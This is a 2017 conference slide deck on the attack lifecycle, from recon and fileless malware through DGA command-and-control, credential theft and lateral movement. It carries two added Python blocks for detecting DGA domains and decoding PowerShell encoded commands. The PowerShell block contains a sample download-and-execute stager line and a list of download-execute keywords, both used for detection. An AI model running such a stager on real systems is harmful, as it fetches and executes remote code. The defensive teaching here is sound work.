NTXISSACSC5 Blue 4: The Attack Life Cycle (Erich Mueller)

Page 1

NTXISSA Cyber Security Conference – November 10-11, 2017 @NTXISSA #NTXISSACSC5

The Attack Lifecycle – Conquering All Stages of an Attack

Erich Mueller

Solutions Engineer

Cybereason

November 10, 2017

Page 2

Hunting for the Adversary

(Figure: cost to the attacker of each capability)

• Innovation (Tough!)
• Custom Development (Challenging)
• Botnet, Hacked Server, Hosting ($20)
• Stolen Credit Card ($5)
• Obfuscator ($0.05)
• Rebuild Code ($0.00)

Page 3

Are you under attack?

Initial Infection | C&C | Privilege Escalation | Recon | Lateral Movement | Damage

Page 4

External Recon

• People/Social Engineering
  o Conferences
  o Call help desk or admin
• Technology
  o External scans
  o Buy information & tools on black market
• Business Intelligence
  o Trusted relationships
  o 3rd party vendors

“Even Rao, a highly experienced cybersecurity researcher, nearly fell for the scam, as he happened to have recently mailed a package via UPS.”

Page 5

Initial Infection

• Phishing & spear phishing

• Vulnerability exploit

• Infected USB drive


Page 6

Initial Infection: Process Injection

Running a procedure as a thread inside another process

• Evasion

• Reading host process memory

• Affecting host process behavior

• Server persistence


Page 7

Initial Infection: Fileless Malware

Malicious code launches and carries out an infection within a tool or process

• Unlike traditional malware
  o Doesn’t use a file
  o Runs in memory of the device

Examples of processes/tools

• Legitimate Windows processes
• Windows management interface
• Meterpreter
• Executing remote commands


Page 8

Command & Control

Why

• Establish and maintain connection to:
  o Execute malicious code
  o Update malware
  o Send back collected info
  o Provide heartbeat to indicate the attack is still alive

How

• Legitimate HTTP
• Legitimate DNS request
• Fast Flux
• TOR
• IRC
• Facebook / Twitter / YouTube comments
• Domain Generation Algorithm


Page 9

Command & Control: Domain Generation Algorithm

• C&C servers quickly get blacklisted
• DGA generates thousands of domains
  o Predictable to the attacker, unpredictable to the security researcher
  o Only one of them will be the live C&C
• When the C&C domain is blacklisted, the attacker:
  o Selects another generated domain
  o Registers it
  o Continues the attack
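A defender-side illustration of the point above, added here and not part of the talk: the generated names are unpredictable to the researcher, but they share statistical traits (random-looking, vowel-poor labels), and because only one is registered, an infected host's other lookups fail with NXDOMAIN. The log format, the sample records and the thresholds are constructed assumptions.

```python
# Added example (not from the slides): flag DGA-like lookups in a DNS resolver
# log. Generated labels look random (high entropy, few vowels) and, since only
# one of the thousands is registered, most lookups fail with NXDOMAIN.
import math
from collections import defaultdict

# Constructed sample log, one "client qname rcode" record per line (not real data).
SAMPLE_LOG = """\
10.0.0.5 www.example.com NOERROR
10.0.0.5 mail.example.com NOERROR
10.0.0.7 xk3jq9zpw2lmvn8r.com NXDOMAIN
10.0.0.7 q7vbn2xzplk4wtr9.net NXDOMAIN
10.0.0.7 zp9mlk3xvqw7trbn.com NXDOMAIN
10.0.0.7 w4lkzx9pqv2mtn7r.org NOERROR
10.0.0.9 cdn.example.net NOERROR
"""

def shannon_entropy(s):
    """Bits per character; 16 distinct chars in a 16-char label gives 4.0."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def second_level_label(qname):
    """The registrable label just left of the TLD (sub-domains are ignored)."""
    parts = qname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def is_dga_like(qname, min_len=12, min_entropy=3.5, max_vowel_ratio=0.25):
    """Heuristic; the thresholds are assumptions to tune per environment."""
    label = second_level_label(qname)
    if len(label) < min_len:
        return False
    vowel_ratio = sum(ch in "aeiou" for ch in label) / len(label)
    return shannon_entropy(label) >= min_entropy and vowel_ratio <= max_vowel_ratio

def analyze(log_text, nx_threshold=3):
    """Per client: DGA-like names and NXDOMAIN count; keep clients hitting either."""
    per_client = defaultdict(lambda: {"dga_like": [], "nxdomain": 0})
    for line in log_text.splitlines():
        client, qname, rcode = line.split()
        if rcode == "NXDOMAIN":
            per_client[client]["nxdomain"] += 1
        if is_dga_like(qname):
            per_client[client]["dga_like"].append(qname)
    return {c: v for c, v in per_client.items()
            if v["dga_like"] or v["nxdomain"] >= nx_threshold}
```

Either indicator alone produces false positives (CDN hostnames, typos), so a hunt starts from clients that show both, as 10.0.0.7 does here.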


Page 10

Privilege Escalation

Why

• Gain better persistence
• Cred dump/user impersonation
• Operate under the radar

How

• Exploit vulnerabilities
  o Command line vulnerability
  o Process injection
• Leverage improper configurations
  o Local admin rights for all users
  o User lockout policies


Page 11

Privilege Escalation: Exploit Windows Vulnerabilities

• Windows kernel mode driver vulnerabilities
• Windows task scheduler vulnerabilities
• Vulnerabilities in Windows design
  o Windows user account control (UAC)
  o DLL search order


Page 13

Internal Reconnaissance

Why

• Paint a picture of the IT infrastructure
  o Who are the administrators?
  o What steps get me closer to my target?
  o What type of services are running?
• Identify target and a path to the target

How

• ARP scanning
• NetBIOS enumeration
• Port scanning
• Credential stealing


Page 14

Recon: Port Scanning

• Services use ports to communicate
  o HTTP = 80, DNS = 53, etc…
• Attacker scans the subnet to find exposed and exploitable services


Page 15

Recon: Credential Theft

• Mimikatz
• Windows Credential Editor
• Lazagne


Page 16

Lateral Movement

Why

• Gain access to target machines
  o Domain controllers
  o OWA
• Persistence

How

• Use legitimate tools maliciously
  o Pass The Hash/Ticket
  o Shares
  o PSExec
  o RDP
  o SSH
  o PowerShell
  o SCCM


Page 17

Lateral Movement: PsExec

Legitimate use

IT admin runs PsExec to run a process on a remote machine interactively

Malicious use

Attacker runs PsExec with stolen credential hashes to spread their malware through an entire network

Page 18

Lateral Movement: PowerShell

Legitimate use

IT admin runs PowerShell to monitor firewall

Malicious use

Attacker runs PowerShell with encoded commands to spread malware
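As an added example (not from the talk), decoding the -EncodedCommand argument is the detection counterpart to the malicious use above: PowerShell accepts the script as base64 of UTF-16LE text, so keywords only become visible after decoding. The process records, the keyword list and the placeholder URL are constructed assumptions.

```python
# Added example (not from the slides): decode PowerShell -EncodedCommand
# arguments from process-creation records and flag download-and-execute
# patterns that plain keyword matching on the command line would miss.
import base64
import re

# -e/-ec/-en/-enc/-EncodedCommand followed by a base64 blob (case-insensitive).
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Constructed keyword list typical of download-and-execute one-liners.
SUSPICIOUS = ("downloadstring", "downloadfile", "invoke-expression", "net.webclient",
              "invoke-webrequest", "frombase64string", "start-process", "bitstransfer")

def encode_for_sample(script):
    """Build an -EncodedCommand value the way PowerShell expects it (UTF-16LE + base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries a valid encoded command, else None."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # not base64, or odd byte count
        return None

def triage(cmdline):
    """Return (decoded_script, matched indicators); indicators are empty if benign."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return None, []
    low = script.lower()
    return script, [k for k in SUSPICIOUS if k in low]

# Constructed process-creation records (not real telemetry). The benign one
# mirrors the "monitor firewall" admin use from the slide.
BENIGN = "powershell.exe -NoProfile -EncodedCommand " + encode_for_sample(
    "Get-NetFirewallProfile | Select-Object Name, Enabled")
STAGER = "powershell.exe -nop -w hidden -enc " + encode_for_sample(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload.ps1')")
```

Decode first, then match; alerting on the encoded switch alone drowns in legitimate admin automation.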

Page 19

Lateral Movement: Pass-the-Ticket

Legitimate authentication: Kerberos


Page 20

Lateral Movement: Pass-the-Ticket

Malicious use: Pass the Ticket


Page 21

Persistence

Why

• Establish long term access

• Primary goal is often persistent access

How

• Scheduled tasks

• Autoruns

• Temp files

• Fileless malware


Page 22

Damage

• FTP/SSH
• Email
• DNS
• Dropbox
• Pastebin

o Ransomware
o Corporate financials
o Credit card data
o System corruption

(Figure labels: Business / Profit / Sabotage)

Page 23

Are you under attack?

Page 24

Total Enterprise PROTECTION

Page 25

A Layered Approach to Security

Page 26

Thank you